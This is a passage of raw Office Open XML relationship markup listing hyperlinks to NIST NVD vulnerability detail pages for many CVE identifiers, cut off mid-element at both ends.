TargetMode="External" Id="rId4289" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85547" TargetMode="External" Id="rId4290" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86314" TargetMode="External" Id="rId4291" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86315" TargetMode="External" Id="rId4292" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87732" TargetMode="External" Id="rId4293" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87733" TargetMode="External" Id="rId4294" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-30983" TargetMode="External" Id="rId4295" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-24291" TargetMode="External" Id="rId4296" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-51684" TargetMode="External" Id="rId4297" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-7639" TargetMode="External" Id="rId4298" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18090" TargetMode="External" Id="rId4299" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18330" TargetMode="External" Id="rId4300" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18562" TargetMode="External" Id="rId4301" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18843" TargetMode="External" Id="rId4302" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18964" TargetMode="External" Id="rId4303" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19727" TargetMode="External" Id="rId4304" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19797" TargetMode="External" Id="rId4305" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19872" TargetMode="External" Id="rId4306" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19985" TargetMode="External" Id="rId4307" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21094" TargetMode="External" Id="rId4308" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-22029" TargetMode="External" Id="rId4309" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-30250" TargetMode="External" Id="rId4310" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-32773" TargetMode="External" Id="rId4311" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-37710" TargetMode="External" Id="rId4312" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47883" TargetMode="External" Id="rId4313" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47887" TargetMode="External" Id="rId4314" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48551" TargetMode="External" Id="rId4315" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50771" TargetMode="External" Id="rId4316" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50980" TargetMode="External" Id="rId4317" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52232" TargetMode="External" Id="rId4318" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52370" TargetMode="External" Id="rId4319" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52773" TargetMode="External" Id="rId4320" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52774" TargetMode="External" Id="rId4321" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54687" TargetMode="External" Id="rId4322" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55059" TargetMode="External" Id="rId4323" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55087" TargetMode="External" Id="rId4324" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55530" TargetMode="External" Id="rId4325" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55648" TargetMode="External" Id="rId4326" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56706" TargetMode="External" Id="rId4327" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61526" TargetMode="External" Id="rId4328" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63670" TargetMode="External" Id="rId4329" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70620" TargetMode="External" Id="rId4330" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71403" TargetMode="External" Id="rId4331" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71435" TargetMode="External" Id="rId4332" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71478" TargetMode="External" Id="rId4333" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72769" TargetMode="External" Id="rId4334" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73084" TargetMode="External" Id="rId4335" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73235" TargetMode="External" Id="rId4336" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73288" TargetMode="External" Id="rId4337" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73434" TargetMode="External" Id="rId4338" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73506" TargetMode="External" Id="rId4339" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75170" TargetMode="External" Id="rId4340" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75307" TargetMode="External" Id="rId4341" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75586" TargetMode="External" Id="rId4342" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76002" TargetMode="External" Id="rId4343" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77150" TargetMode="External" Id="rId4344" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77654" TargetMode="External" Id="rId4345" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77818" TargetMode="External" Id="rId4346" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-7804" TargetMode="External" Id="rId4347" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78172" TargetMode="External" Id="rId4348" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78377" TargetMode="External" Id="rId4349" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78738" TargetMode="External" Id="rId4350" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78741" TargetMode="External" Id="rId4351" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78742" TargetMode="External" Id="rId4352" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79419" TargetMode="External" Id="rId4353" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80180" TargetMode="External" Id="rId4354" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80190" TargetMode="External" Id="rId4355" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84369" TargetMode="External" Id="rId4356" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-8447" TargetMode="External" Id="rId4357" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84960" TargetMode="External" Id="rId4358" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85227" TargetMode="External" Id="rId4359" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85229" TargetMode="External" Id="rId4360" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85484" TargetMode="External" Id="rId4361" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85485" TargetMode="External" Id="rId4362" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85630" TargetMode="External" Id="rId4363" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85645" TargetMode="External" Id="rId4364" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86254" TargetMode="External" Id="rId4365" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87640" TargetMode="External" Id="rId4366" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88023" TargetMode="External" Id="rId4367" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88024" TargetMode="External" Id="rId4368" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88025" TargetMode="External" Id="rId4369" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88029" TargetMode="External" Id="rId4370" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88030" TargetMode="External" Id="rId4371" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88031" TargetMode="External" Id="rId4372" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88033" TargetMode="External" Id="rId4373" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88034" TargetMode="External" Id="rId4374" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88036" TargetMode="External" Id="rId4375" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-6717" TargetMode="External" Id="rId4376" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-71410" TargetMode="External" Id="rId4377" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-71411" TargetMode="External" Id="rId4378" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-71413" TargetMode="External" Id="rId4379" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0294" TargetMode="External" Id="rId4380" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16172" TargetMode="External" Id="rId4381" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16481" TargetMode="External" Id="rId4382" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17084" TargetMode="External" Id="rId4383" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17610" TargetMode="External" Id="rId4384" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18368" TargetMode="External" Id="rId4385" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-24225" TargetMode="External" Id="rId4386" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-25250" TargetMode="External" Id="rId4387" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45415" TargetMode="External" Id="rId4388" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47624" TargetMode="External" Id="rId4389" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53508" TargetMode="External" Id="rId4390" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56101" TargetMode="External" Id="rId4391" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58139" TargetMode="External" Id="rId4392" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62672" TargetMode="External" Id="rId4393" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65985" TargetMode="External" Id="rId4394" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67335" TargetMode="External" Id="rId4395" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70603" TargetMode="External" Id="rId4396" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71191" TargetMode="External" Id="rId4397" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71192" TargetMode="External" Id="rId4398" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73627" TargetMode="External" Id="rId4399" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77123" TargetMode="External" Id="rId4400" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78216" TargetMode="External" Id="rId4401" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78230" TargetMode="External" Id="rId4402" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78552" TargetMode="External" Id="rId4403" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78622" TargetMode="External" Id="rId4404" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79778" TargetMode="External" Id="rId4405" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79779" TargetMode="External" Id="rId4406" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79780" TargetMode="External" Id="rId4407" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82056" TargetMode="External" Id="rId4408" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82059" TargetMode="External" Id="rId4409" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82063" TargetMode="External" Id="rId4410" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85622" TargetMode="External" Id="rId4411" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86078" TargetMode="External" Id="rId4412" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86084" TargetMode="External" Id="rId4413" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86096" TargetMode="External" Id="rId4414" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9033" TargetMode="External" Id="rId4415" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2017-4971" TargetMode="External" Id="rId4416" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2017-8039" TargetMode="External" Id="rId4417" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0307" TargetMode="External" Id="rId4418" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16004" TargetMode="External" Id="rId4419" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18149" TargetMode="External" Id="rId4420" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19596" TargetMode="External" Id="rId4421" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21105" TargetMode="External" Id="rId4422" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-32593" TargetMode="External" Id="rId4423" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-32637" TargetMode="External" Id="rId4424" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-37171" TargetMode="External" Id="rId4425" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45404" TargetMode="External" Id="rId4426" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45751" TargetMode="External" Id="rId4427" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45752" TargetMode="External" Id="rId4428" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45763" TargetMode="External" Id="rId4429" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45791" TargetMode="External" Id="rId4430" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48061" TargetMode="External" Id="rId4431" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48154" TargetMode="External" Id="rId4432" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49343" TargetMode="External" Id="rId4433" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49837" TargetMode="External" Id="rId4434" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49838" TargetMode="External" Id="rId4435" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49870" TargetMode="External" Id="rId4436" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50558" TargetMode="External" Id="rId4437" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52739" TargetMode="External" Id="rId4438" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55854" TargetMode="External" Id="rId4439" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55856" TargetMode="External" Id="rId4440" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55857" TargetMode="External" Id="rId4441" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55858" TargetMode="External" Id="rId4442" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55859" TargetMode="External" Id="rId4443" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55860" TargetMode="External" Id="rId4444" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58237" TargetMode="External" Id="rId4445" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58238" TargetMode="External" Id="rId4446" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61614" TargetMode="External" Id="rId4447" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66776" TargetMode="External" Id="rId4448" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66777" TargetMode="External" Id="rId4449" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6727" TargetMode="External" Id="rId4450" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67395" TargetMode="External" Id="rId4451" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68527" TargetMode="External" Id="rId4452" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69304" TargetMode="External" Id="rId4453" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 